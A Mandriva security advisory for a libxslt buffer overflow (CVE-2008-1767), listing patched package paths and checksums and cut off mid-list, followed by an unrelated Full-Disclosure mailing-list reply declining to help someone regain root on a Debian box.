-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:151 http://www.mandriva.com/security/ ___ Package : libxslt Date: July 21, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: A buffer overflow vulnerability in libxslt could be exploited via an XSL style sheet file with a long XLST transformation match condition, which could possibly lead to the execution of arbitrary code (CVE-2008-1767). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1767 ___ Updated Packages: Mandriva Linux 2007.1: 269e6513a992d9e016db3908e06590f5 2007.1/i586/libxslt1-1.1.20-2.1mdv2007.1.i586.rpm 035cc26a3cfdfe3961ce07289e0f1625 2007.1/i586/libxslt1-devel-1.1.20-2.1mdv2007.1.i586.rpm acb69204b57de4cb539c7c1829f4b6e9 2007.1/i586/libxslt-proc-1.1.20-2.1mdv2007.1.i586.rpm d19e9c0ef2bfb8ae3e5ec910e26735d6 2007.1/i586/python-libxslt-1.1.20-2.1mdv2007.1.i586.rpm 4901c1bedaaa6367afe269874d3daa64 2007.1/SRPMS/libxslt-1.1.20-2.1mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 8fcff8e0c639455c50315af9d420b020 2007.1/x86_64/lib64xslt1-1.1.20-2.1mdv2007.1.x86_64.rpm 5ddbaa4453c968da07fb497f75ede8d2 2007.1/x86_64/lib64xslt1-devel-1.1.20-2.1mdv2007.1.x86_64.rpm 3acf4044b3d8eccf21e94dd1cdb03f7c 2007.1/x86_64/libxslt-proc-1.1.20-2.1mdv2007.1.x86_64.rpm 46d41b25c0feb01ca0b16ef251b51236 2007.1/x86_64/python-libxslt-1.1.20-2.1mdv2007.1.x86_64.rpm 4901c1bedaaa6367afe269874d3daa64 2007.1/SRPMS/libxslt-1.1.20-2.1mdv2007.1.src.rpm Mandriva Linux 2008.0: b54f606226545944f6691bc5b4951af4 2008.0/i586/libxslt1-1.1.22-2.1mdv2008.0.i586.rpm ff696b5846ae5936b5602094922a3276 2008.0/i586/libxslt-devel-1.1.22-2.1mdv2008.0.i586.rpm 92328e34c084986c674e16184492365a 2008.0/i586/libxslt-proc-1.1.22-2.1mdv2008.0.i586.rpm b2fe8b69925a6d6c8671f9d2146de82d 2008.0/i586/python-libxslt-1.1.22-2.1mdv2008.0.i586.rpm c26a63ef401930cc523fe98b34ba3c9a 2008.0/SRPMS/libxslt-1.1.22-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d93a7df55dbf546d3bb03f84ccfd3e46 2008.0/x86_64/lib64xslt1-1.1.22-2.1mdv2008.0.x86_64.rpm 79098087f94766034cf27925ef0923b7 2008.0/x86_64/lib64xslt-devel-1.1.22-2.1mdv2008.0.x86_64.rpm 22e0c6c896efe7cff21f8242cd362e79 2008.0/x86_64/libxslt-proc-1.1.22-2.1mdv2008.0.x86_64.rpm 9ecb4e151c77575bff8b627b26fbf949 2008.0/x86_64/python-libxslt-1.1.22-2.1mdv2008.0.x86_64.rpm c26a63ef401930cc523fe98b34ba3c9a 2008.0/SRPMS/libxslt-1.1.22-2.1mdv2008.0.src.rpm Mandriva Linux 2008.1: 564225f1f8fc90de67dcf190bf367a54 2008.1/i586/libxslt1-1.1.22-2.1mdv2008.1.i586.rpm 4a245a02cca0f57b94d3b838d55cd646 2008.1/i586/libxslt-devel-1.1.22-2.1mdv2008.1.i586.rpm 408a00d6b663ff7cec94210551ffab5b 2008.1/i586/libxslt-proc-1.1.22-2.1mdv2008.1.i586.rpm ff3e1498caf4afdc098c7ed6aa93eaaa 2008.1/i586/python-libxslt-1.1.22-2.1mdv2008.1.i586.rpm f942f9a3ed7756b0909197478b1cbab0 2008.1/SRPMS/libxslt-1.1.22-2.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 494326373eca400d832d2bd4a87cbf32 2008.1/x86_64/lib64xslt1-1.1.22-2.1mdv2008.1.x86_64.rpm dcdfaa95b392d09b809341a50e381a1d 2008.1/x86_64/lib64xslt-devel-1.1.22-2.1mdv2008.1.x86_64.rpm da14b3e445e1711cc20d9151b94dbf4a 2008.1/x86_64/libxslt-proc-1.1.22-2.1mdv2008.1.x86_64.rpm 5f553b350a9a96a784b754b8da3b1331 2008.1/x86_64/python-libxslt-1.1.22-2.1mdv2008.1.x86_64.rpm f942f9a3ed7756b0909197478b1cbab0 2008.1/SRPMS/libxslt-1.1.22-2.1mdv2008.1.src.rpm Corporate 3.0: 3bad56368c2013918528b5c91d36a540 corporate/3.0/i586/libxslt1-1.1.2-1.1.C30mdk.i586.rpm e8f0d690402867f35fe383f57f1309fb corporate/3.0/i586/libxslt1-devel-1.1.2-1.1.C30mdk.i586.rpm e31d2747065fbe3290bcdea0429f4b38 corporate/3.0/i586/libxslt-proc-1.1.2-1.1.C30mdk.i586.rpm 292bd60026d2fab7c121e8dd4ebe7489 corporate/3.0/i586/libxslt-python-1.1.2-1.1.C30mdk.i586.rpm 6f482d0addecb3334b2d48e5219c7e89 corporate/3.0/SRPMS/libxslt-1.1.2-1.1.C30mdk.src.rpm Corporate 3.0/X86_64: 334e2ddcc66df63e59a5cf3bed7aa12e corporate/3.0/x86_64/lib64xslt1-1.1.2-1.1.C30mdk.x86_64.rpm 25185db8f68ee30df4382b83ba3e91da corporate/3.0/x86_64/lib64xslt1-devel-1.1.2-1.1.C30mdk.x86_64.rpm 99f9597a0e431d68db06d34175658512 corporate/3.0/x86_64/libxslt-proc-1.1.2-1.1.C30mdk.x86_64.rpm af53b90f2c6c10a9abe11ee3d655ffb9 corporate/3.0/x86_64/libxslt-python-1.1.2-1.1.C30mdk.x86_64.rpm 6f482d0addecb3334b2d48e5219c7e89 corporate/3.0/SRPMS/libxslt-1.1.2-1.1.C30mdk.src.rpm Corporate 4.0: 401a4225975ceee992bfcf8f7fe1c717 corpor
Re: [Full-disclosure] help: I need to crack my box
2008/7/21 Lucio Crusca <[EMAIL PROTECTED]>: > Believe it or not, I have a linux box (mine, yes it's mine) I need to own... > the problem is that it phisically resides a few 100km from here and someone > else has changed the root password... I can still log in as luser and I > wonder if I have a chance to become root again. It's a more or less current > debian lenny i386 with gnome. Have you got anything for me? Probably not and I can't think anyone hiding a 0-day is going to release it for this. Sorry. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
